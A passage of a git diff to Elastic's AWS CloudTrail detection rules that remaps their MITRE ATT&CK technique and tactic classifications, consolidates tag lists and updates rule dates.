Discovery", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS IAM", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "threshold" @@ -115,34 +106,21 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1087" name = "Account Discovery" reference = "https://attack.mitre.org/techniques/T1087/" + [[rule.threat.technique.subtechnique]] id = "T1087.004" name = "Cloud Account" reference = "https://attack.mitre.org/techniques/T1087/004/" - - [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1110" -name = "Brute Force" -reference = "https://attack.mitre.org/techniques/T1110/" - - -[rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" - [rule.threshold] field = ["cloud.account.id", "user.name", "source.ip"] value = 25 diff --git a/rules/integrations/aws/discovery_ssm_inventory_reconnaissance.toml b/rules/integrations/aws/discovery_ssm_inventory_reconnaissance.toml index 1998dca1376..1653177f8bc 100644 --- a/rules/integrations/aws/discovery_ssm_inventory_reconnaissance.toml +++ b/rules/integrations/aws/discovery_ssm_inventory_reconnaissance.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/11" integration = ["aws"] maturity = "production" -updated_date = "2026/02/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -124,10 +124,11 @@ field_names = [ [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1538" -name = "Cloud Service Dashboard" -reference = "https://attack.mitre.org/techniques/T1538/" +id = "T1518" +name = "Software Discovery" +reference = "https://attack.mitre.org/techniques/T1518/" [[rule.threat.technique]] id = "T1580" @@ -138,7 +139,6 @@ reference = "https://attack.mitre.org/techniques/T1580/" id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" - [rule.new_terms] field = "new_terms_fields" value = ["cloud.account.id", "user.name"] diff --git a/rules/integrations/aws/execution_lambda_external_layer_added_to_function.toml b/rules/integrations/aws/execution_lambda_external_layer_added_to_function.toml index f410c0aad7a..01217202d6c 100644 --- a/rules/integrations/aws/execution_lambda_external_layer_added_to_function.toml +++ b/rules/integrations/aws/execution_lambda_external_layer_added_to_function.toml @@ -2,7 +2,7 @@ creation_date = "2024/04/30" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -85,15 +85,7 @@ references = [ risk_score = 21 rule_id = "7d091a76-0737-11ef-8469-f661ea17fbcc" severity = "low" -tags = [ - "Domain: Cloud", - "Data Source: AWS", - "Data Source: Amazon Web Services", - "Data Source: AWS Lambda", - "Use Case: Threat Detection", - "Tactic: Execution", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS Lambda", "Use Case: Threat Detection", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -107,17 +99,34 @@ event.dataset: aws.cloudtrail [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1578" +name = "Modify Cloud Compute Infrastructure" +reference = "https://attack.mitre.org/techniques/T1578/" + +[[rule.threat.technique.subtechnique]] +id = "T1578.005" +name = "Modify Cloud Compute Configurations" +reference = "https://attack.mitre.org/techniques/T1578/005/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1648" name = "Serverless Execution" reference = "https://attack.mitre.org/techniques/T1648/" - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/execution_new_terms_cloudformation_createstack.toml b/rules/integrations/aws/execution_new_terms_cloudformation_createstack.toml index 7164fa9a520..17dfd9e37dd 100644 --- a/rules/integrations/aws/execution_new_terms_cloudformation_createstack.toml +++ b/rules/integrations/aws/execution_new_terms_cloudformation_createstack.toml @@ -2,7 +2,7 @@ creation_date = "2024/07/25" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -98,14 +98,14 @@ field_names = [ framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1648" -name = "Serverless Execution" -reference = "https://attack.mitre.org/techniques/T1648/" +id = "T1651" +name = "Cloud Administration Command" +reference = "https://attack.mitre.org/techniques/T1651/" + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - [rule.new_terms] field = "new_terms_fields" value = ["cloud.account.id", "user.name"] diff --git a/rules/integrations/aws/exfiltration_dynamodb_scan_by_unusual_user.toml b/rules/integrations/aws/exfiltration_dynamodb_scan_by_unusual_user.toml index d54fc7697a2..4746bdbd03c 100644 --- a/rules/integrations/aws/exfiltration_dynamodb_scan_by_unusual_user.toml +++ b/rules/integrations/aws/exfiltration_dynamodb_scan_by_unusual_user.toml @@ -2,7 +2,7 @@ creation_date = "2025/03/13" integration = ["aws"] maturity = "production" -updated_date = "2025/09/08" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -60,15 +60,7 @@ risk_score = 21 rule_id = "96b2a03e-003b-11f0-8541-f661ea17fbcd" setup = "DynamoDB data events must be enabled in CloudTrail to capture the Scan action. Ensure that the AWS CloudTrail service is configured to log data events for DynamoDB tables." severity = "low" -tags = [ - "Domain: Cloud", - "Data Source: AWS", - "Data Source: Amazon Web Services", - "Data Source: AWS DynamoDB", - "Resources: Investigation Guide", - "Use Case: Threat Detection", - "Tactic: Exfiltration", -] +tags = ["Domain: Cloud", "Tactic: Collection", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS DynamoDB", "Resources: Investigation Guide", "Use Case: Threat Detection"] timestamp_override = "event.ingested" type = "new_terms" @@ -82,29 +74,16 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1567" -name = "Exfiltration Over Web Service" -reference = "https://attack.mitre.org/techniques/T1567/" - -[rule.threat.tactic] -id = "TA0010" -name = "Exfiltration" -reference = "https://attack.mitre.org/tactics/TA0010/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1530" name = "Data from Cloud Storage" reference = "https://attack.mitre.org/techniques/T1530/" - [rule.threat.tactic] id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/exfiltration_ec2_export_task.toml b/rules/integrations/aws/exfiltration_ec2_export_task.toml index 0934b06a3a4..d6187d0130b 100644 --- a/rules/integrations/aws/exfiltration_ec2_export_task.toml +++ b/rules/integrations/aws/exfiltration_ec2_export_task.toml @@ -2,7 +2,7 @@ creation_date = "2025/10/23" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -77,16 +77,7 @@ references = [ risk_score = 47 rule_id = "deee5856-25ba-438d-ae53-09d66f41b127" severity = "medium" -tags = [ - "Domain: Cloud", - "Data Source: AWS", - "Data Source: Amazon Web Services", - "Data Source: AWS EC2", - "Use Case: Asset Visibility", - "Tactic: Exfiltration", - "Tactic: Collection", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Tactic: Exfiltration", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS EC2", "Use Case: Asset Visibility", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -100,39 +91,21 @@ event.dataset: "aws.cloudtrail" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1537" -name = "Transfer Data to Cloud Account" -reference = "https://attack.mitre.org/techniques/T1537/" +id = "T1567" +name = "Exfiltration Over Web Service" +reference = "https://attack.mitre.org/techniques/T1567/" +[[rule.threat.technique.subtechnique]] +id = "T1567.002" +name = "Exfiltration to Cloud Storage" +reference = "https://attack.mitre.org/techniques/T1567/002/" [rule.threat.tactic] id = "TA0010" name = "Exfiltration" reference = "https://attack.mitre.org/tactics/TA0010/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1005" -name = "Data from Local System" -reference = "https://attack.mitre.org/techniques/T1005/" - -[[rule.threat.technique]] -id = "T1119" -name = "Automated Collection" -reference = "https://attack.mitre.org/techniques/T1119/" - -[[rule.threat.technique]] -id = "T1530" -name = "Data from Cloud Storage" -reference = "https://attack.mitre.org/techniques/T1530/" - - -[rule.threat.tactic] -id = "TA0009" -name = "Collection" -reference = "https://attack.mitre.org/tactics/TA0009/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/exfiltration_ec2_full_network_packet_capture_detected.toml b/rules/integrations/aws/exfiltration_ec2_full_network_packet_capture_detected.toml index a0aa65612d3..c0fa1715988 100644 --- a/rules/integrations/aws/exfiltration_ec2_full_network_packet_capture_detected.toml +++ b/rules/integrations/aws/exfiltration_ec2_full_network_packet_capture_detected.toml @@ -2,7 +2,7 @@ creation_date = "2021/05/05" integration = ["aws"] maturity = "production" -updated_date = "2026/01/21" +updated_date = "2026/03/23" [rule] author = ["Elastic", "Austin Songer"] @@ -99,16 +99,7 @@ references = [ risk_score = 47 rule_id = "c1812764-0788-470f-8e74-eb4a14d47573" severity = "medium" -tags = [ - "Domain: Cloud", - "Data Source: AWS", - "Data Source: Amazon Web Services", - "Data Source: AWS EC2", - "Use Case: Network Security Monitoring", - "Tactic: Exfiltration", - "Tactic: Collection", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Tactic: Discovery", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS EC2", "Use Case: Network Security Monitoring", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -122,46 +113,16 @@ event.dataset: "aws.cloudtrail" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1020" -name = "Automated Exfiltration" -reference = "https://attack.mitre.org/techniques/T1020/" - -[[rule.threat.technique]] -id = "T1537" -name = "Transfer Data to Cloud Account" -reference = "https://attack.mitre.org/techniques/T1537/" - - -[rule.threat.tactic] -id = "TA0010" -name = "Exfiltration" -reference = "https://attack.mitre.org/tactics/TA0010/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1074" -name = "Data Staged" -reference = "https://attack.mitre.org/techniques/T1074/" - -[rule.threat.tactic] -id = "TA0009" -name = "Collection" -reference = "https://attack.mitre.org/tactics/TA0009/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1040" name = "Network Sniffing" reference = "https://attack.mitre.org/techniques/T1040/" - [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/exfiltration_rds_snapshot_export.toml b/rules/integrations/aws/exfiltration_rds_snapshot_export.toml index a0ba6578562..42239c6cd28 100644 --- a/rules/integrations/aws/exfiltration_rds_snapshot_export.toml +++ b/rules/integrations/aws/exfiltration_rds_snapshot_export.toml @@ -2,7 +2,7 @@ creation_date = "2021/06/06" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/23" [rule] author = ["Elastic", "Austin Songer"] @@ -151,28 +151,38 @@ event.dataset: aws.cloudtrail [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0010" -name = "Exfiltration" -reference = "https://attack.mitre.org/tactics/TA0010/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1213" name = "Data from Information Repositories" reference = "https://attack.mitre.org/techniques/T1213/" + [[rule.threat.technique.subtechnique]] id = "T1213.006" name = "Databases" reference = "https://attack.mitre.org/techniques/T1213/006/" - - [rule.threat.tactic] id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1567" +name = "Exfiltration Over Web Service" +reference = "https://attack.mitre.org/techniques/T1567/" + +[[rule.threat.technique.subtechnique]] +id = "T1567.002" +name = "Exfiltration to Cloud Storage" +reference = "https://attack.mitre.org/techniques/T1567/002/" + +[rule.threat.tactic] +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/exfiltration_s3_bucket_policy_added_for_external_account_access.toml b/rules/integrations/aws/exfiltration_s3_bucket_policy_added_for_external_account_access.toml index 999b1b4a28f..508c391abc5 100644 --- a/rules/integrations/aws/exfiltration_s3_bucket_policy_added_for_external_account_access.toml +++ b/rules/integrations/aws/exfiltration_s3_bucket_policy_added_for_external_account_access.toml @@ -2,7 +2,7 @@ creation_date = "2024/04/17" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -116,16 +116,7 @@ references = [ risk_score = 47 rule_id = "e8c9ff14-fd1e-11ee-a0df-f661ea17fbce" severity = "medium" -tags = [ - "Domain: Cloud", - "Data Source: AWS", - "Data Source: Amazon Web Services", - "Data Source: AWS S3", - "Use Case: Threat Detection", - "Tactic: Exfiltration", - "Tactic: Collection", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Tactic: Persistence", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS S3", "Use Case: Threat Detection", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -148,29 +139,16 @@ and not stringContains(aws.cloudtrail.request_parameters, aws.cloudtrail.recipie [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1537" -name = "Transfer Data to Cloud Account" -reference = "https://attack.mitre.org/techniques/T1537/" - -[rule.threat.tactic] -id = "TA0010" -name = "Exfiltration" -reference = "https://attack.mitre.org/tactics/TA0010/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1530" -name = "Data from Cloud Storage" -reference = "https://attack.mitre.org/techniques/T1530/" - +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" [rule.threat.tactic] -id = "TA0009" -name = "Collection" -reference = "https://attack.mitre.org/tactics/TA0009/" - +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/exfiltration_s3_bucket_policy_added_for_public_access.toml b/rules/integrations/aws/exfiltration_s3_bucket_policy_added_for_public_access.toml index 6d7ba2052c1..326b18d51b8 100644 --- a/rules/integrations/aws/exfiltration_s3_bucket_policy_added_for_public_access.toml +++ b/rules/integrations/aws/exfiltration_s3_bucket_policy_added_for_public_access.toml @@ -2,7 +2,7 @@ creation_date = "2025/10/30" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -115,16 +115,7 @@ references = [ risk_score = 47 rule_id = "618bb351-00f0-467b-8956-8cace8b81f07" severity = "medium" -tags = [ - "Domain: Cloud", - "Data Source: AWS", - "Data Source: Amazon Web Services", - "Data Source: AWS S3", - "Use Case: Threat Detection", - "Tactic: Exfiltration", - "Tactic: Collection", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS S3", "Use Case: Threat Detection", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -140,29 +131,16 @@ info where event.dataset == "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1537" -name = "Transfer Data to Cloud Account" -reference = "https://attack.mitre.org/techniques/T1537/" - -[rule.threat.tactic] -id = "TA0010" -name = "Exfiltration" -reference = "https://attack.mitre.org/tactics/TA0010/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1530" -name = "Data from Cloud Storage" -reference = "https://attack.mitre.org/techniques/T1530/" - +id = "T1484" +name = "Domain or Tenant Policy Modification" +reference = "https://attack.mitre.org/techniques/T1484/" [rule.threat.tactic] -id = "TA0009" -name = "Collection" -reference = "https://attack.mitre.org/tactics/TA0009/" - +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/exfiltration_sns_rare_protocol_subscription_by_user.toml b/rules/integrations/aws/exfiltration_sns_rare_protocol_subscription_by_user.toml index 465364b2801..f744c959733 100644 --- a/rules/integrations/aws/exfiltration_sns_rare_protocol_subscription_by_user.toml +++ b/rules/integrations/aws/exfiltration_sns_rare_protocol_subscription_by_user.toml @@ -2,7 +2,7 @@ creation_date = "2024/11/01" integration = ["aws"] maturity = "production" -updated_date = "2026/01/21" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -64,17 +64,7 @@ references = [ risk_score = 21 rule_id = "3df49ff6-985d-11ef-88a1-f661ea17fbcd" severity = "low" -tags = [ - "Domain: Cloud", - "Data Source: AWS", - "Data Source: Amazon Web Services", - "Data Source: AWS SNS", - "Resources: Investigation Guide", - "Use Case: Threat Detection", - "Tactic: Exfiltration", - "Tactic: Collection", - "Tactic: Impact", -] +tags = ["Domain: Cloud", "Tactic: Exfiltration", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS SNS", "Resources: Investigation Guide", "Use Case: Threat Detection"] timestamp_override = "event.ingested" type = "new_terms" @@ -88,46 +78,16 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1567" name = "Exfiltration Over Web Service" reference = "https://attack.mitre.org/techniques/T1567/" - [rule.threat.tactic] id = "TA0010" name = "Exfiltration" reference = "https://attack.mitre.org/tactics/TA0010/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1530" -name = "Data from Cloud Storage" -reference = "https://attack.mitre.org/techniques/T1530/" - - -[rule.threat.tactic] -id = "TA0009" -name = "Collection" -reference = "https://attack.mitre.org/tactics/TA0009/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1496" -name = "Resource Hijacking" -reference = "https://attack.mitre.org/techniques/T1496/" -[[rule.threat.technique.subtechnique]] -id = "T1496.004" -name = "Cloud Service Hijacking" -reference = "https://attack.mitre.org/techniques/T1496/004/" - - - -[rule.threat.tactic] -id = "TA0040" -name = "Impact" -reference = "https://attack.mitre.org/tactics/TA0040/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/impact_aws_eventbridge_rule_disabled_or_deleted.toml b/rules/integrations/aws/impact_aws_eventbridge_rule_disabled_or_deleted.toml index 4b6fbec2338..1f89a48a949 100644 --- a/rules/integrations/aws/impact_aws_eventbridge_rule_disabled_or_deleted.toml +++ b/rules/integrations/aws/impact_aws_eventbridge_rule_disabled_or_deleted.toml @@ -2,7 +2,7 @@ creation_date = "2021/10/17" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/23" [rule] author = ["Austin Songer", "Elastic"] @@ -100,14 +100,7 @@ references = [ risk_score = 21 rule_id = "87594192-4539-4bc4-8543-23bc3d5bd2b4" severity = "low" -tags = [ - "Domain: Cloud", - "Data Source: AWS", - "Data Source: Amazon Web Services", - "Data Source: AWS EventBridge", - "Tactic: Impact", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS EventBridge", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -121,17 +114,16 @@ event.dataset: aws.cloudtrail [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1489" -name = "Service Stop" -reference = "https://attack.mitre.org/techniques/T1489/" +[[rule.threat.technique]] +id = "T1562" +name = "Impair Defenses" +reference = "https://attack.mitre.org/techniques/T1562/" [rule.threat.tactic] -id = "TA0040" -name = "Impact" -reference = "https://attack.mitre.org/tactics/TA0040/" - +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/impact_aws_s3_bucket_enumeration_or_brute_force.toml b/rules/integrations/aws/impact_aws_s3_bucket_enumeration_or_brute_force.toml index 013d9381c79..6f372dd93a0 100644 --- a/rules/integrations/aws/impact_aws_s3_bucket_enumeration_or_brute_force.toml +++ b/rules/integrations/aws/impact_aws_s3_bucket_enumeration_or_brute_force.toml @@ -2,7 +2,7 @@ creation_date = "2024/05/01" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -80,17 +80,7 @@ references = [ risk_score = 21 rule_id = "5f0234fd-7f21-42af-8391-511d5fd11d5c" severity = "low" -tags = [ - "Domain: Cloud", - "Data Source: AWS", - "Data Source: Amazon Web Services", - "Data Source: AWS S3", - "Resources: Investigation Guide", - "Use Case: Log Auditing", - "Tactic: Impact", - "Tactic: Discovery", - "Tactic: Collection", -] +tags = ["Domain: Cloud", "Tactic: Discovery", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS S3", "Resources: Investigation Guide", "Use Case: Log Auditing"] timestamp_override = "event.ingested" type = "threshold" @@ -111,18 +101,7 @@ field_names = [ [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1657" -name = "Financial Theft" -reference = "https://attack.mitre.org/techniques/T1657/" - -[rule.threat.tactic] -id = "TA0040" -name = "Impact" -reference = "https://attack.mitre.org/tactics/TA0040/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1619" name = "Cloud Storage Object Discovery" @@ -132,20 +111,6 @@ reference = "https://attack.mitre.org/techniques/T1619/" id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1530" -name = "Data from Cloud Storage" -reference = "https://attack.mitre.org/techniques/T1530/" - - -[rule.threat.tactic] -id = "TA0009" -name = "Collection" -reference = "https://attack.mitre.org/tactics/TA0009/" - - [rule.threshold] field = ["tls.client.server_name", "source.address", "aws.cloudtrail.user_identity.type"] value = 1 diff --git a/rules/integrations/aws/impact_cloudtrail_logging_updated.toml b/rules/integrations/aws/impact_cloudtrail_logging_updated.toml index f19cadad27f..05d22d3c38f 100644 --- a/rules/integrations/aws/impact_cloudtrail_logging_updated.toml +++ b/rules/integrations/aws/impact_cloudtrail_logging_updated.toml @@ -2,7 +2,7 @@ creation_date = "2020/06/10" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -65,15 +65,7 @@ references = [ risk_score = 21 rule_id = "3e002465-876f-4f04-b016-84ef48ce7e5d" severity = "low" -tags = [ - "Domain: Cloud", - "Data Source: AWS", - "Data Source: Amazon Web Services", - "Data Source: AWS Cloudtrail", - "Use Case: Log Auditing", - "Resources: Investigation Guide", - "Tactic: Impact", -] +tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS Cloudtrail", "Use Case: Log Auditing", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -87,34 +79,21 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1565" -name = "Data Manipulation" -reference = "https://attack.mitre.org/techniques/T1565/" -[[rule.threat.technique.subtechnique]] -id = "T1565.001" -name = "Stored Data Manipulation" -reference = "https://attack.mitre.org/techniques/T1565/001/" - - -[rule.threat.tactic] -id = "TA0040" -name = "Impact" -reference = "https://attack.mitre.org/tactics/TA0040/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1530" -name = "Data from Cloud Storage" -reference = "https://attack.mitre.org/techniques/T1530/" +id = "T1562" +name = "Impair Defenses" +reference = "https://attack.mitre.org/techniques/T1562/" +[[rule.threat.technique.subtechnique]] +id = "T1562.008" +name = "Disable or Modify Cloud Logs" +reference = "https://attack.mitre.org/techniques/T1562/008/" [rule.threat.tactic] -id = "TA0009" -name = "Collection" -reference = "https://attack.mitre.org/tactics/TA0009/" - +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/impact_cloudwatch_log_group_deletion.toml b/rules/integrations/aws/impact_cloudwatch_log_group_deletion.toml index 1f6a8dd5d98..461ca5fca01 100644 --- a/rules/integrations/aws/impact_cloudwatch_log_group_deletion.toml +++ b/rules/integrations/aws/impact_cloudwatch_log_group_deletion.toml @@ -2,7 +2,7 @@ creation_date = "2020/05/18" integration = ["aws"] maturity = "production" -updated_date = "2026/01/21" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -126,16 +126,7 @@ references = [ risk_score = 47 rule_id = "68a7a5a5-a2fc-4a76-ba9f-26849de881b4" severity = "medium" -tags = [ - "Domain: Cloud", - "Data Source: AWS", - "Data Source: Amazon Web Services", - "Data Source: Amazon CloudWatch", - "Use Case: Log Auditing", - "Resources: Investigation Guide", - "Tactic: Defense Evasion", - "Tactic: Impact", -] +tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: Amazon CloudWatch", "Use Case: Log Auditing", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -151,34 +142,21 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1485" -name = "Data Destruction" -reference = "https://attack.mitre.org/techniques/T1485/" - -[rule.threat.tactic] -id = "TA0040" -name = "Impact" -reference = "https://attack.mitre.org/tactics/TA0040/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" -[[rule.threat.technique.subtechnique]] -id = "T1562.001" -name = "Disable or Modify Tools" -reference = "https://attack.mitre.org/techniques/T1562/001/" - +[[rule.threat.technique.subtechnique]] +id = "T1562.008" +name = "Disable or Modify Cloud Logs" +reference = "https://attack.mitre.org/techniques/T1562/008/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/impact_cloudwatch_log_stream_deletion.toml b/rules/integrations/aws/impact_cloudwatch_log_stream_deletion.toml index 6312cf48c76..2579dfe7c4f 100644 --- a/rules/integrations/aws/impact_cloudwatch_log_stream_deletion.toml +++ b/rules/integrations/aws/impact_cloudwatch_log_stream_deletion.toml @@ -2,7 +2,7 @@ creation_date = "2020/05/20" integration = ["aws"] maturity = "production" -updated_date = "2026/01/21" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -113,16 +113,7 @@ references = [ risk_score = 47 rule_id = "d624f0ae-3dd1-4856-9aad-ccfe4d4bfa17" severity = "medium" -tags = [ - "Domain: Cloud", - "Data Source: AWS", - "Data Source: Amazon Web Services", - "Data Source: Amazon CloudWatch", - "Use Case: Log Auditing", - "Tactic: Defense Evasion", - "Tactic: Impact", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: Amazon CloudWatch", "Use Case: Log Auditing", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -138,34 +129,21 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1485" -name = "Data Destruction" -reference = "https://attack.mitre.org/techniques/T1485/" - -[rule.threat.tactic] -id = "TA0040" -name = "Impact" -reference = "https://attack.mitre.org/tactics/TA0040/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" -[[rule.threat.technique.subtechnique]] -id = "T1562.001" -name = "Disable or Modify Tools" -reference = "https://attack.mitre.org/techniques/T1562/001/" - +[[rule.threat.technique.subtechnique]] +id = "T1562.008" +name = "Disable or Modify Cloud Logs" +reference = "https://attack.mitre.org/techniques/T1562/008/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/impact_ec2_disable_ebs_encryption.toml b/rules/integrations/aws/impact_ec2_disable_ebs_encryption.toml index 0aa53f8fd0e..59ca5c226e9 100644 --- a/rules/integrations/aws/impact_ec2_disable_ebs_encryption.toml +++ b/rules/integrations/aws/impact_ec2_disable_ebs_encryption.toml @@ -2,7 +2,7 @@ creation_date = "2020/06/05" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -107,14 +107,7 @@ references = [ risk_score = 47 rule_id = "bb9b13b2-1700-48a8-a750-b43b0a72ab69" severity = "medium" -tags = [ - "Domain: 